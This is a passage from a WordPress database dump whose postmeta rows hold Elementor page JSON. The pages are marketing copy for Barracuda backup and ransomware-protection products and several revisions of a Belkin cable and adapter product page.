costs.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b42f8d2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"87b8c7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3a791a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Moving from the Data Center to the Public Cloud<\\/strong><\\/h2><p>When you migrate your applications to the public cloud, traditional on-premises firewall functionality often doesn\\u2019t translate well to public cloud environments. Cloud Generation Firewalls are designed to provide support for public cloud deployment best practices, support public cloud specific use cases and facilitate you with a commercial model designed for public cloud consumption.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c77287d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6ee6319\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e078579\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Data Protection<\\/h2><p>Barracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc0006e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"space_between_widgets\":20},\"elements\":[{\"id\":\"8b37789\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Barracuda Backup<\\/h2><p>Cloud-integrated protection for business-critical data wherever it resides<\\/p><h2>Cloud-to-Cloud Backup<\\/h2><p>Cloud-based backup and recovery to protects Office 365 emails and data from accidental and malicious data loss<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f36f0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"89998d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5dad7ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Don\\u2019t Be a Ransomware Victim<\\/h2><h4>Ransomware is on the rise. Barracuda\\u2019s multi-layered defense protects your data (and your money).<\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16afbe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0a2b893\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c2ff8c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Understanding Ransomware<\\/h2><p>Ransomware is a type of malware that lets attackers find and encrypt your most important data. They then offer to provide the decryption key only if you pay a ransom, within a short time. This is the number one IT security challenge that you face today, with resource-limited small and mid-size businesses the most likely targets.<\\/p><p>Cybercriminals exploit a variety of threat vectors, including email, network traffic, user behavior, and application traffic to insert ransomware. Without a comprehensive security strategy that secures all these vectors, you are almost certain to become a victim.<\\/p><ul><li>47% of businesses have been affected by ransomware.<\\/li><li>The FBI reports that $209 million was paid to ransomware criminals in the first quarter of 2016.<\\/li><li>59% of ransomware infections are delivered via email attachments and embedded URLs.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"147ae8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92b3892\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/zNkTopX68tk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38a9cde\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6089c4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0af1560\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5>Barracuda provides a complete family of solutions that work together to help you detect, prevent, and recover from ransomware attacks.<\\/h5>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a4c0aee\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ef21656\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c2ba2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Detect\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"575ceaf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Detect ransomware and other advanced threats, using automated online threat scanners (offered at no charge) and advanced, multi-layer detection technologies including sandbox analysis.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5a62511\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df80f58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Prevent\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d782d44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Prevent them from infecting your systems, thanks to best-of-breed products to secure your network perimeter, email, web traffic, and outward-facing web applications.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8e73c67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9a5394b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Recover\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dde960b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Recover quickly and easily in case attackers are successful, with state-of-the-art backup solutions that leave attackers with nothing, while you get right back to business.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6db2b62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2001646\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2f2451\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Why is Backup Necessary for Office 365?<\\/h2><p>The number one cause of data loss in a SaaS deployment, such as Microsoft Office 365, is accidental data deletion. In fact, about 70 percent of all lost data is due to either accidental or malicious deletion of data by end-users. Other ways that data can be lost include misconfiguration, client sync issues, and most recently the widespread presence of malware and ransomware, which can render data unusable.<\\/p><p>Although Microsoft Office 365 provides some basic recovery options with the recycle bin and email retention, Microsoft\\u2019s primary focus within Office 365 is ensuring that service and data availability are not disrupted. It is your responsibility to protect the data that you store in the Office 365 cloud. Barracuda Cloud-to-Cloud Backup provides comprehensive, cost-effective, and scalable protection of your Office 365 data \\u2013without adding to your infrastructure costs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e0769b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"02b4dd5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca2ac7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>What We Protect<\\/h2><p>Barracuda\\u2019s Cloud-to-Cloud Backup Service backs up all of your Office 365 data to secure Barracuda Cloud Storage with no need for on-premises infrastructure. You can back up data on demand or according to an automated schedule. All Exchange Online, SharePoint Online, and OneDrive for Business data is deduplicated and compressed for maximum storage efficiency and reduced backup windows before being stored in the Barracuda Cloud.<\\/p><p>Exchange Online. Barracuda protects the complete folder structure of each user\\u2019s mailbox including all email message and attachments.<br \\/>OneDrive for Business. All files and folders under the Documents Library are protected.<br \\/>SharePoint Online. We protect SharePoint data including Document Libraries, Site Assets, and Picture Libraries within both Team Sites and Public Sites are protected.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c472b20\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4fd4474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Fast and Easy Recovery Options<\\/h2><p>All Office 365 data backed up to the Barracuda Cloud is accessible, searchable, and retrievable from anywhere with an Internet connection. Data can be recovered from the site level down to the individual item level. Messages, folders, or even entire mailboxes and be restored back to the original user and location, to a different location within the account, or to a completely different user account. You can also download items for offline use.<\\/p><p>If you\\u2019re looking for a specific file or message but are unsure of its location, the search feature can be used to find the item quickly and easily. You can also recover data to a specific point in time by selecting the specific dates from a built-in calendar. Recovered data is compressed to minimize download times.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f39b5e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4141c34\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae09c83\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Powerful Reporting and Statistics<\\/h2><p>For IT Administrators, detailed reporting and audit logging are a key component of a backup solution. Barracuda Cloud-to-Cloud Backup provides backup status and health monitoring for each backup source. Automated email alerts are delivered after each backup to specified email recipients containing a summary of the backup and detailed information about which email messages, folders, and files were added, modified, and removed since the last backup.<\\/p><p>On the Status page, graphs show the number of items added and amount of data backed up each day. Storage statistics and graphs detail how much data has been backed up overall and the storage efficiency, as well as how much data is actually being stored in the Barracuda Cloud after deduplication and compression. An Audit Log tracks and provides details about every action performed within the Cloud-to-Cloud Backup interface.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6637,3262,'_elementor_version','0.4'),(8690,3669,'_elementor_controls_usage','a:0:{}'),(8691,3669,'swift-performance','a:0:{}');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (6641,1446,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4>&nbsp;<\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\n<p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p>\\n<h3>Global leader in tech.<\\/h3>\\n<p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p>\\n<h3>Always looking to the future<\\/h3>\\n<p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p>\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\n<p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p>\\n<h3>Unmatched performance, every time<\\/h3>\\n<p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p>\\n<h3>We believe good design matters.<\\/h3>\\n<p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p><\\/p>\\n<p><\\/p>\\n<h3>Product&nbsp; : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong style=\\\"background-color: transparent; font-size: 0.875rem;\\\">3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><br><\\/p><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\"><\\/p>\\n<p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p>\\n<p><\\/p><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p>\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Micro HDMI Adapter<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td>\\n<td width=\\\"150\\\">\\n<p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\"><\\/p>\\n<p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p>\\n<p><\\/p>\\n<p><\\/p>\\n<p><\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6642,3263,'_wp_page_template','template-fullwidth.php'),(6643,3263,'_elementor_edit_mode','builder'),(6644,3263,'_elementor_template_type','post'),(6645,3263,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4><\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\\n<h3>Global leader in tech.<\\/h3>\\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\\n<h3>Always looking to the future<\\/h3>\\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.\\n<h3>Unmatched performance, every time<\\/h3>\\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\\n<h3>We believe good design matters.<\\/h3>\\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\\n\\n&nbsp;\\n\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\\n\\n&nbsp;\\n<h4>Product : -<\\/h4>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/>\\n\\n<strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Mini DisplayPortTM to VGA<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Micro HDMI Adapter<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Lightning Audio + Charge RockStar\\u2122<\\/strong>\\n\\n[maxbutton id=\\\"9\\\" ]<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6647,1446,'_elementor_version','2.5.14'),(6670,3267,'_wp_page_template','template-fullwidth.php'),(6671,3267,'_elementor_edit_mode','builder'),(6649,3264,'_wp_page_template','template-fullwidth.php'),(6650,3264,'_elementor_edit_mode','builder'),(6651,3264,'_elementor_template_type','post'),(6652,3264,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2><h4>\\u00a0<\\/h4><h3>Innovation, with quality at its core<\\/h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p><h3>Global leader in tech.<\\/h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p><h3>Always looking to the future<\\/h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p><h3>An unwavering commitment to earning your trust.<\\/h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p><h3>Unmatched performance, every time<\\/h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p><h3>We believe good design matters.<\\/h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p><p>\\u00a0<br \\/>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p><h4>Product : -<\\/h4><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/><\\/p><p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p><p>[maxbutton id=\\\"9\\\" ]<\\/p><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2331\\\" 